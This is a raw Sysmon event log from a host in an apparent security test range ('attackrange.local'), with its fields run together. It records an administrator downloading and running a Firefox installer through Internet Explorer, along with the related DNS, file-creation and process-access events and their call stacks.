22542200x800000000000000013820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:38.495{59A5CD1D-8E56-6005-2E00-00000000A301}246456.189.224.13.in-addr.arpa.0type: 12 server-13-224-189-56.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 10341000x800000000000000013833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+1a1666|C:\Windows\SYSTEM32\IEFRAME.dll+65e1|C:\Windows\SYSTEM32\IEFRAME.dll+5ea7|C:\Windows\SYSTEM32\IEFRAME.dll+831a|C:\Windows\SYSTEM32\IEFRAME.dll+160b0d|C:\Windows\SYSTEM32\IEFRAME.dll+e5191|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16 10341000x800000000000000013832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+1a1666|C:\Windows\SYSTEM32\IEFRAME.dll+65e1|C:\Windows\SYSTEM32\IEFRAME.dll+5ea7|C:\Windows\SYSTEM32\IEFRAME.dll+831a|C:\Windows\SYSTEM32\IEFRAME.dll+160b0d|C:\Windows\SYSTEM32\IEFRAME.dll+e5191|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36 10341000x800000000000000013831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+1a1666|C:\Windows\SYSTEM32\IEFRAME.dll+65e1|C:\Windows\SYSTEM32\IEFRAME.dll+5ea7|C:\Windows\SYSTEM32\IEFRAME.dll+831a|C:\Windows\SYSTEM32\IEFRAME.dll+160b0d|C:\Windows\SYSTEM32\IEFRAME.dll+e5191|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16 10341000x800000000000000013830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDownloads2021-01-18 13:59:41.646{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXEC:\Users\Administrator\Downloads\Firefox Installer.exe.t6yq1ad.partial2021-01-18 13:59:41.646 11241100x800000000000000013827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDownloads2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Administrator\Downloads\Firefox Installer.exe.t6yq1ad.partial2021-01-18 13:59:41.646 10341000x800000000000000013826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.568{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.568{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.943{59A5CD1D-944E-6005-2105-00000000A301}57726004C:\Users\Administrator\Downloads\Firefox 
Installer.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+159f0b(wow64)|C:\Windows\System32\KERNELBASE.dll+159bbc(wow64)|C:\Users\Administrator\Downloads\Firefox Installer.exe+18fd0|C:\Users\Administrator\Downloads\Firefox Installer.exe+1a0da|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 154100x800000000000000013870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.953{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe84.0.2Firefox InstallerFirefoxMozilla Corporationsetup-stub.exe.\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=13616B0D9805FA0528FCCE4ABF30BA03,SHA256=DA0DF48FE9468F1335CD30E513E18357273CC7DDEBF8284444E595517E98D7B6,IMPHASH=E2A592076B17EF8BFB48B7E03965A3FC{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe"C:\Users\Administrator\Downloads\Firefox Installer.exe" 10341000x800000000000000013869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:42.943{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.943{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.943{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:42.927{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe2021-01-18 13:59:42.927 10341000x800000000000000013865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox 
Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox 
Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox 
